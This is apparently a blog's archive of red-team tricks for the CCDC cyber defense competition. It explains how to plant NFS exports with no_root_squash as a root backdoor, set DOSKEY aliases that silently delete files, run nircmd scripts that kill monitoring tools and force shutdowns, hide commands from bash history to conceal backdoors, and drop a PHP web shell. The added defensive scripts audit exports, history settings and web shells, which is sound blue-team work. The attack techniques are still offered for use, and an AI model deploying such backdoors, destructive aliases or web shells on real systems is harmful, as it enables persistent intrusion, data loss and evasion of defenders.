
Entries in ccdc (6)

Tuesday, Mar 01 2011

Creating Vulnerabilities: NFS Exports

Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. NFS exports, however, are hardly ever noticed. Setting one up on an Ubuntu/Debian box is a snap, and given the right directory and permissions it leads you right back to a shell any time you want, without keeping a connection open (an rw export of /root, for instance, lets you drop your key into /root/.ssh/authorized_keys from any client). Plus, NFS blends right in: nfsd listens on port 2049 over TCP and/or UDP.

Here is a quick how-to on setting up NFS

https://help.ubuntu.com/community/SettingUpNFSHowTo

I'm sure you can think of much more evil locations, but /etc/, /var/www/ and /root/ are some of my favorite exports, and there is no reason you couldn't just export '/' itself; nfsd accepts that too.

Remember to add no_root_squash to the export options (the default, root_squash, maps a remote uid 0 to nobody), and you are golden: anything you write from the client lands on the target owned by root.
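The flip side for anyone defending a box: the same handful of export options is exactly what to look for. Below is an added example, not code from this post, that reads an /etc/exports file and flags entries that are mountable by anyone (empty or "*" client spec), carry no_root_squash or insecure, or export the paths named above; which options count as risky is my assumption, and the sample exports file at the bottom is constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not code from the post: flag risky entries in an /etc/exports
# file. The heuristics are assumptions: an empty or "*" client spec (anyone can
# mount it), no_root_squash (a remote uid 0 stays root on the server, which is
# what the post wants), insecure (nfsd accepts requests from unprivileged
# source ports, so any user on an allowed client can talk to it), and the
# paths the post names as favourite exports.

audit_exports() {
    local file=$1 path rest spec client opts reasons
    local -a specs
    while read -r path rest || [ -n "$path" ]; do
        case $path in ''|'#'*) continue ;; esac
        # exportfs treats a path with no client list as exported to everyone.
        [ -z "$rest" ] && rest='*'
        # read -a splits on whitespace without glob-expanding the "*" client.
        read -r -a specs <<< "$rest"
        for spec in "${specs[@]}"; do
            client=${spec%%\(*}
            case $spec in
                *\(*) opts=${spec#*\(}; opts=${opts%\)} ;;
                *)    opts='' ;;
            esac
            reasons=''
            case $client in ''|'*') reasons+='world-mountable;' ;; esac
            case ",$opts," in *,no_root_squash,*) reasons+='no_root_squash;' ;; esac
            case ",$opts," in *,insecure,*) reasons+='insecure ports;' ;; esac
            case $path in
                /|/etc|/etc/*|/root|/root/*|/var/www|/var/www/*) reasons+='sensitive path;' ;;
            esac
            if [ -n "$reasons" ]; then
                printf '%s %s(%s) -> %s\n' "$path" "${client:-*}" "$opts" "${reasons%;}"
            fi
        done
    done < "$file"
    return 0
}

# Constructed sample exports file for the demo (not taken from any real host).
sample_exports=$(mktemp)
trap 'rm -f "$sample_exports"' EXIT
cat > "$sample_exports" <<'EOF'
# /etc/exports: constructed sample
/home/shared 10.0.0.0/24(rw,sync,root_squash)
/var/www *(rw,no_root_squash)
/etc 10.0.0.5(rw,no_root_squash,insecure) 10.0.0.6(ro)
/
EOF

audit_exports "$sample_exports"
```

Run it against a real /etc/exports with `audit_exports /etc/exports`; only the /home/shared line in the sample passes clean, because it is limited to one subnet and keeps root_squash.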

 

Tuesday, Mar 01 2011

Destructive DOSKEY aliases

Not sure how far back it goes (Win95?), but 2000, XP and everything up to Win 7 ship with a program called DOSKEY:

C:\Users\vmadmin>doskey /?
Edits command lines, recalls Windows commands, and creates macros.

DOSKEY [/REINSTALL] [/LISTSIZE=size] [/MACROS[:ALL | :exename]]
  [/HISTORY] [/INSERT | /OVERSTRIKE] [/EXENAME=exename] [/MACROFILE=filename]
  [macroname=[text]]

  /REINSTALL          Installs a new copy of Doskey.
  /LISTSIZE=size      Sets size of command history buffer.
  /MACROS             Displays all Doskey macros.
  /MACROS:ALL         Displays all Doskey macros for all executables which have
                      Doskey macros.
  /MACROS:exename     Displays all Doskey macros for the given executable.
  /HISTORY            Displays all commands stored in memory.
  /INSERT             Specifies that new text you type is inserted in old text.
  /OVERSTRIKE         Specifies that new text overwrites old text.
  /EXENAME=exename    Specifies the executable.
  /MACROFILE=filename Specifies a file of macros to install.
  macroname           Specifies a name for a macro you create.
  text                Specifies commands you want to record.

UP and DOWN ARROWS recall commands; ESC clears command line; F7 displays
command history; ALT+F7 clears command history; F8 searches command
history; F9 selects a command by number; ALT+F10 clears macro definitions.

The following are some special codes in Doskey macro definitions:
$T     Command separator.  Allows multiple commands in a macro.
$1-$9  Batch parameters.  Equivalent to %1-%9 in batch programs.
$*     Symbol replaced by everything following macro name on command line.

 

Much like the Linux 'alias' command, you can remap pretty much any command you want. Here are some of the more evil ones I have used in the past:

 

  • doskey cd=del /f /s $1 (changing into a directory silently deletes everything under it)
  • doskey tasklist=type tasklist.txt (shows a canned process list you prepared instead of the real one; cmd.exe has no 'cat', so use 'type')
  • doskey dir=dir \..\..\..\ (always lists the drive root, whatever directory you are in)

 

I'm sure you can think of a ton more..

The great thing is that there isn't a /delete switch. You just have to know that to remove a doskey macro you issue the definition without the aliased part, so 'doskey tasklist=' deletes the tasklist macro. One caveat: macros only live in the cmd.exe session that defined them, so to make them stick you have to load them (for example via /MACROFILE) from the Command Processor AutoRun registry value that cmd.exe runs on every start.

 

Tuesday, Mar 01 2011

Psychological Warfare with NirCMD

One of the best ways to throw blue teamers off the scent of another host getting owned (with the added effect of stressing them out) is a batch script that runs through some of the more annoying features of nircmd.exe in succession and at regular intervals:

http://www.nirsoft.net/utils/nircmd.html

 

  • setdisplay 640x480
  • killprocess taskmgr.exe
  • killprocess procexp.exe
  • win -style title "my computer" 0x00c00000
  • win child title "my computer" +exstyle all 0x00400000
  • win +exstyle title "my computer" 0x00400000
  • win trans ititle "internet explorer" 256
  • win close class "CabinetWClass"
  • multiremote copy "c:\temp\computers.txt" exitwin poweroff force
  • exitwin logoff
  • standby
  • monitor off
  • win child class "Shell_TrayWnd" hide class "button"
  • win hide class progman

 

Just to name a few...

Another fun batch script to have running is 'echo knock knock | clip' in an endless, delay-free loop. It makes 'knock knock' the only thing that will ever be pasted ;-)

 

Tuesday, Mar 01 2011

Issue a Linux command without it going into history

CORRECTION:

Thanks to jduck for pointing it out: the leading-space trick only works if HISTCONTROL is set to ignorespace (or ignoreboth, which also drops consecutive duplicates); with HISTCONTROL unset, bash records the command, space and all. Reference: http://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/ and search for: Modifying History Behavior

 

With that set, you simply put a space before the command:

mubix@localhost:/tmp/demo$ ls -alh
total 8.0K
drwxr-xr-x 2 mubix mubix 4.0K Mar  1 19:43 .
drwxrwxrwt 3 root  root  4.0K Mar  1 19:43 ..
-rw-r--r-- 1 mubix mubix    0 Mar  1 19:43 bob
mubix@localhost:/tmp/demo$ cat ~/.bash_history
ls -alh

mubix@localhost:/tmp/demo$  mysecretlogin -u bobsuruncle -p allacazaam

mubix@localhost:/tmp/demo$ cat ~/.bash_history
ls -alh

mubix@localhost:/tmp/demo$

 

Works well for backdoors you don't want caught via the .bash_history as well ;-)
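Since the trick depends on HISTCONTROL, the setting itself is the thing a blue teamer can hunt for. Below is an added example, not code from this post, that scans shell start-up files for the settings that keep commands out of ~/.bash_history: HISTCONTROL with ignorespace/ignoreboth, a zero HISTSIZE or HISTFILESIZE, an unset or /dev/null HISTFILE, 'set +o history', and HISTIGNORE. Which lines count as evasion is my assumption based on bash's documented history variables, and the .bashrc fragment at the bottom is constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not code from the post: report lines in shell start-up files
# that keep commands out of ~/.bash_history. Which settings count as evasion
# is an assumption based on bash's documented history variables.

audit_history_evasion() {
    local file line trimmed n reason
    for file in "$@"; do
        n=0
        while IFS= read -r line || [ -n "$line" ]; do
            n=$((n + 1))
            trimmed=${line#"${line%%[![:space:]]*}"}   # drop leading whitespace
            case $trimmed in ''|'#'*) continue ;; esac  # skip blanks and comments
            reason=''
            case $trimmed in
                *HISTCONTROL=*ignorespace*|*HISTCONTROL=*ignoreboth*)
                    reason='commands typed with a leading space are not saved' ;;
                *HISTSIZE=0*|*HISTFILESIZE=0*)
                    reason='history size forced to zero' ;;
                *HISTFILE=/dev/null*|*'unset HISTFILE'*)
                    reason='no history file will be written' ;;
                *'set +o history'*)
                    reason='history recording switched off' ;;
                *HISTIGNORE=*)
                    reason='commands matching HISTIGNORE are not saved' ;;
            esac
            if [ -n "$reason" ]; then
                printf '%s:%d: %s   <- %s\n' "$file" "$n" "$trimmed" "$reason"
            fi
        done < "$file"
    done
    return 0
}

# Constructed ~/.bashrc fragment for the demo (not from any real user).
sample_rc=$(mktemp)
trap 'rm -f "$sample_rc"' EXIT
cat > "$sample_rc" <<'EOF'
# constructed ~/.bashrc fragment
export PATH="$PATH:$HOME/bin"
export HISTCONTROL=ignoreboth
alias ll='ls -alh'
HISTSIZE=0
    unset HISTFILE
set +o history
HISTIGNORE='*mysecretlogin*'
EOF

audit_history_evasion "$sample_rc"
```

On a real system run it as `audit_history_evasion ~/.bashrc ~/.bash_profile /etc/bash.bashrc /etc/profile.d/*.sh`; a HISTCONTROL line in a system-wide file is the case to check first, since it hides the leading-space trick for every user at once.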

More CCDC tricks as I think of them..

 

Tuesday, Mar 01 2011

PHP Web Shell

This is mostly for my own memory for CCDC:

<?php system($_GET['cmd']); ?>

I wonder what will happen if an RSS reader doesn't do proper filtering...
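For the blue team side of the same one-liner, here is an added example, not code from this post, that hunts a web root for PHP files where a command-execution or eval call takes its argument straight from a request superglobal. The regex is my assumption about what such a shell looks like (it deliberately ignores anything routed through a variable first), and the sample web root at the bottom is constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not code from the post: hunt a web root for one-liner PHP
# shells like the one above. The pattern is an assumption: a command execution
# or eval call whose argument comes straight from a request superglobal.

hunt_webshells() {
    local root=$1
    # -r recurse, -l list matching files only, -E extended regex;
    # --include limits the scan to .php files. grep exits 1 on no match,
    # which is not an error for a hunt, hence "|| true".
    grep -rlE --include='*.php' \
        '(^|[^[:alnum:]_])(system|exec|shell_exec|passthru|popen|proc_open|eval)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)[[:space:]]*\[' \
        "$root" || true
}

# Constructed sample web root for the demo (not a real site).
sample_root=$(mktemp -d)
trap 'rm -rf "$sample_root"' EXIT
mkdir -p "$sample_root/uploads"
# the post's one-liner
printf '%s\n' "<?php system(\$_GET['cmd']); ?>" > "$sample_root/shell.php"
# same idea with odd spacing, hiding in an upload directory
printf '%s\n' '<?php passthru ( $_POST["c"] ); ?>' > "$sample_root/uploads/image.php"
# benign use of a superglobal: must not be reported
printf '%s\n' "<?php echo htmlspecialchars(\$_GET['q']); ?>" > "$sample_root/index.php"
# not a .php file, so PHP will never execute it: skipped by --include
printf '%s\n' "<?php system(\$_GET['cmd']); ?>" > "$sample_root/notes.txt"

hunt_webshells "$sample_root"
```

Point it at the real document root with `hunt_webshells /var/www`; the two constructed shells are reported and index.php is not, because reading `$_GET` is normal, while handing it to system() is not.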